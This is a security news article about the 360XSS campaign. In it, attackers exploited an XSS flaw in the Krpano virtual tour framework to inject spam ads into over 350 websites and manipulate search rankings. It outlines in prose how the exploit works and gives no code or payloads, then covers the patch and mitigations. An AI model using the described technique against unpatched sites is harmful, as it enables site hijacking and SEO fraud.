Massive XSS Exploit in Virtual Tour Framework Hijacks 350+ Websites for Spam Ads and SEO Manipulation

A cross-site scripting (XSS) vulnerability in the Krpano virtual tour framework has been exploited by attackers to inject malicious scripts across hundreds of websites, manipulating search rankings and fueling a large-scale spam ad campaign.

Overview of the Attack

Dubbed 360XSS, the campaign was discovered by security researcher Oleg Zaytsev, who found that over 350 websites, including government portals, universities, Fortune 500 companies, hotel chains, and news outlets, were compromised. Attackers used these legitimate domains to distribute spam ads for pornography, diet supplements, online casinos, and fake news, as well as to boost YouTube video views.

The attack leverages an XSS flaw in Krpano, a popular framework used to embed 360° images and videos for VR experiences and virtual tours. The vulnerability allows attackers to inject scripts via a specially crafted URL, redirecting visitors to malicious ads while taking advantage of trusted websites to boost search engine rankings—a technique known as SEO poisoning.

How the Exploit Works

• Attackers abuse the "passQueryParameters" setting in Krpano, which allows passing HTTP parameters to the panorama viewer.
• A malicious XML parameter in the URL enables the execution of Base64-encoded scripts from a separate website.
• The script fetches spam ad URLs from another legitimate site, disguising them as credible search results.

The XSS vulnerability (CVE-2020-24901, CVSS score: 6.1) was originally reported in 2020, and while Krpano’s version 1.20.10 introduced restrictions to prevent abuse, certain configurations still left sites vulnerable.

A Unique and Widespread Attack

• Weaponizing Search Engines: Unlike traditional reflected XSS attacks, which require users to click a malicious link, attackers manipulated search engine results to trick users into organically visiting compromised links.
• Hijacking Trustworthy Domains: By embedding spam ads within reputable websites, the attackers ensured high search rankings and credibility.
• Avoiding More Malicious Exploits: While XSS vulnerabilities can be used for credential theft or cookie hijacking, this campaign primarily focused on ad revenue and traffic manipulation, raising suspicions about shady advertising firms being behind the attack.

Mitigation and Fixes

After the responsible disclosure, Krpano released version 1.22.4, which completely removes external XML configuration support, eliminating the XSS risk. The update includes:

• Blocking external URLs in the passQueryParameters setting.
• Restricting XML file paths to the current folder structure.

Website owners using Krpano are strongly advised to update to the latest version and disable "passQueryParameters" to prevent exploitation. Additionally, those affected should use Google Search Console to locate and remove any infected pages.

While the identity of the attackers remains unknown, this campaign highlights the growing sophistication of SEO poisoning attacks and the importance of securing third-party frameworks against exploitation.